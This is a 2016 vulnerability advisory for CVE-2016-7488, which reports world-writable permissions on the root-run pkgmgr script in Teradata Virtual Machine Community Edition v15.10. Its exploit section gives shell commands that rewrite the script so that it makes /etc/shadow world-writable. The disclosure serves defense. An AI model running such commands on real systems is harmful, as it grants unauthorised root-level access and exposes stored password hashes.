Advisory #: 172
Title: Teradata Virtual Machine Community Edition v15.10 has insecure file permission
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
CVE-ID:[CVE-2016-7488]
CWE: CWE-264 Permissions, Privileges, and Access Control
Download Site: http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: webform contact
Advisory: http://www.vapidlabs.com/advisory.php?v=172
Description: A database appliance for virtual machine environments.
Vulnerability:
Teradata Virtual Machine Community Edition v15.10 has insecure file permissions on /etc/luminex/pkgmgr. These could allow a local user to modify its contents and execute commands as root. TVME:/ # ls -ld /etc/luminex/ drwxrwxrwx 2 root root 4096 Mar 3 2016 /etc/luminex/ TVME:/# ls -l /etc/luminex/ total 128 -rwxrwxrwx 1 root root 24576 Mar 3 2016 packages.db -rwxrwxrwx 1 root root 102357 Mar 3 2016 pkgmgr
Export: JSON TEXT XML
Exploit Code:
  1. $ echo "#/bin/bash" > /etc/luminex/pkgmgr
  2. $ echo "chmod 666 /etc/shadow" >> /etc/luminex/pkgmgr
  3. $ chmod 755 /etc/luminex/pkgmgr
  4.  
Screen Shots:
Notes: